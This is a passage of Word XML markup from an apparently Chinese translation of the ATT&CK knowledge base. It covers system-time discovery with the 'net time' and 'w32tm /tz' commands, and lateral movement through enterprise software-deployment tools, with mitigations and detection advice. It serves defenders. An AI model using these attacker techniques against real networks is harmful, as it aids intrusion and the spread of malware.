              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="007526C7">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6E6387C3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="007364D2" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5C3C52" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>W</w:t>
      </w:r>
      <w:r>
        <w:t>indows</w:t>
      </w:r>
      <w:r>
        <w:t>服务设置并保存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>域内</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来维护企业网络</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>内</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统和服务之间的时间同步。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8318FE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会从本地或远程系统收集系统时间和</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或时区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。可以通过多种方式来收集此信息，例如在</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Net</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>net time \hostname</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来收集远程系统上的系统时间</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。还可以从当前系统时间推断</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被攻击对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时区，或使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>w32tm /tz</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令收</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被攻击对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的时区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。该信息可能对执行其他技术很有用，例如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过计划任务</w:t>
      </w:r>
      <w:r>
        <w:t>技术来</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行文件，或基于时区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现位置信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从而锁定攻击目标</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C627DD8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982C2CE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种类型的攻击技术基于系统功能的滥用，无法通过预防性控制来轻松缓解其造成的影响。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48780BB6" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40662BC5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
        <w:sectPr w:rsidR="00A0413E" w:rsidSect="00D7725A">
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1440" w:right="1080" w:bottom="1440" w:left="1080" w:header="567" w:footer="567" w:gutter="0"/>
          <w:cols w:space="425"/>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行界面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会有助于</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>net.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例或其他用于收集系统时间或时区</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息的</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令行实用程序。检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于收集</w:t>
      </w:r>
      <w:r>
        <w:t>此信息的</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用可</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能不太有用，因为合法软件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会频繁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用</w:t>
      </w:r>
      <w:r w:rsidRPr="00657AC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>它们。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6353AE1D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:after="312"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>横向</w:t>
      </w:r>
      <w:r>
        <w:t>移动</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4B7FAE" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B1BF6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用部署软件</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="62646B4B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="176DF454" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B80B6F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B80B6F">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:t xml:space="preserve"> T1017</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7043043E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B80B6F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>横向移动</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5606B489" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B80B6F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B80B6F">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A48C8E7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00BD2528" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B80B6F">
              <w:t>系统要求</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD2528">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00BD2528">
              <w:t>应用程序部署软件访问权（</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD2528">
              <w:t>EPO</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD2528">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD2528">
              <w:t>HPCA</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD2528">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD2528">
              <w:t>Altiris</w:t>
            </w:r>
            <w:r w:rsidRPr="00BD2528">
              <w:t>等）</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35503DA8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B80B6F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B80B6F">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控，进程使用网络，进程监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="625A138C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B80B6F" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B80B6F">
              <w:t>CAPEC</w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:t>编号</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId190" w:tgtFrame="_blank" w:history="1">
              <w:r w:rsidRPr="00B80B6F">
                <w:t>CAPEC-187</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="34ACC092" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B80B6F">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00B80B6F">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4174F64F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00055241" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F1A1B47" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="004C35BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用企业管理员</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="004C35BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的应用程序部署系统将恶意软件部署到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>处于同一个</w:t>
      </w:r>
      <w:r w:rsidRPr="004C35BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络的系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中去</w:t>
      </w:r>
      <w:r w:rsidRPr="004C35BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。此操作所需的权限因系统配置而异</w:t>
      </w:r>
      <w:r w:rsidRPr="004C35BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="004C35BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接访问部署服务器可能需要本地凭据，或者可能需要特定的域凭据。但是，系统可能需要管理帐户才能登录或执行软件部署</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67953FD1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="004C35BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问网络范围或企业范围的软件部署系统使攻击者能够在连接到此类系统的所有系统上执行远程代码。访问可用于横向移动到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>各个</w:t>
      </w:r>
      <w:r w:rsidRPr="004C35BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统，收集信息或产生特定效果，例如擦除所有端点上的硬盘驱动器。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BE2AA3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2259"/>
        <w:gridCol w:w="7477"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00B063B5" w14:paraId="6ADD30DB" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="117696C5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0D82B818" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00B063B5" w14:paraId="0B5FD2B8" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42A82DFB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId191" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00B063B5">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>代码签名</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48F8C9BA" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果可以将应用程序部署系统配置为仅部署已签名的二进制文件，则确保受信任的签名证书不与应用程序部署系统位于同一位置，而是位于无法远程访问或远程访问受到严格控制的系统上。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00B063B5" w14:paraId="3621E29A" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="762390C4" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId192" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00B063B5">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>多因素身份验证</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D75AAAF" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对与应用程序部署软件一起使用的帐户使用多因素身份验证。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00B063B5" w14:paraId="76665A5B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CFEFE6B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId193" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00B063B5">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络分段</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D732BDB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通过使用防火墙，帐户权限分离，组策略和多因素身份验证，确保关键网络系统之间的正确的系统和访问隔离。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00B063B5" w14:paraId="68DFFAA6" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2259" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FA5412E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId194" w:history="1">
              <w:r w:rsidR="00A0413E" w:rsidRPr="00B063B5">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特权账户管理</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7477" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11C25FC0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00B063B5" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00B063B5">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
